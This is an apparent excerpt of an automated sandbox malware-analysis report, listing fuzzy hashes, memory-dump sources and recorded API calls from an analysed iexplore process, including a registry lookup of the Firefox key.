      • Opcode Fuzzy Hash: 9940016f2ae665ea65af1b380e1f88aee23af8b8ce1812b5ed7e633863f40bd2
      • Instruction Fuzzy Hash: 4E016939802305DBDF74EF20C4506BDF3FABF44211FA8486ED441AAAA0CB34D6A1CB61
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: Versionwsprintf
      • String ID: (NT %d.%d Build %d)
      • API String ID: 2108043187-379029606
      • Opcode ID: 11106ed03d2601f68a55a56d557a3635eb194681e91bb89c85851ac9109f557e
      • Instruction ID: 5a79727a6ec1d71b7ee9dfec593f804db3835c833cc42b82a7c6b29c62ee9884
      • Opcode Fuzzy Hash: 11106ed03d2601f68a55a56d557a3635eb194681e91bb89c85851ac9109f557e
      • Instruction Fuzzy Hash: FA016DB1A0021CABDF15EBA8DC05BEDB7BDAB48204F4000D5E609E3291D774AF598FA1
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000002.00000002.499777419.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_3000000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3_catch
      • String ID: @$@
      • API String ID: 3886170330-149943524
      • Opcode ID: 1b11bc5207c6a27aaebbfae167115acfb506d44845b26654eb1a7bfa8e8687ec
      • Instruction ID: f6164dd03fb246b8e3bf5306ac13d5d9c2e1802445418c2b3d81decc135bdaf7
      • Opcode Fuzzy Hash: 1b11bc5207c6a27aaebbfae167115acfb506d44845b26654eb1a7bfa8e8687ec
      • Instruction Fuzzy Hash: D6E039B5802349EBDF50DF54CA416DE3760BB00320F518904F825AA1D0C3759FA08B91
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Mozilla\Mozilla Firefox,00000000,00000001,00000000), ref: 04B4B85B
      • RegCloseKey.ADVAPI32(00000000), ref: 04B4B86C
      Strings
      • SOFTWARE\Mozilla\Mozilla Firefox, xrefs: 04B4B851
      Memory Dump Source
      • Source File: 00000002.00000002.500129541.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_2_2_4b40000_iexplore.jbxd
      Yara matches
      Similarity
      • API ID: CloseOpen
      • String ID: SOFTWARE\Mozilla\Mozilla Firefox
      • API String ID: 47109696-1156142290
      • Opcode ID: 5d95f3c348d9dd57de76e04a9efc99b8017c4bf6c7eba6812be02fdfc51cb766
      • Instruction ID: 0b0066be399c667f2f72b460e1c9a33169b051f7453513036fe4a019b0da69f2
      • Opcode Fuzzy Hash: 5d95f3c348d9dd57de76e04a9efc99b8017c4bf6c7eba6812be02fdfc51cb766
      • Instruction Fuzzy Hash: AEE01234650308FBEF108BB5DD07BD977ACEB04B89F104094F501E6290C7A5EA10BA74
      Uniqueness

      Uniqueness Score: -1.00%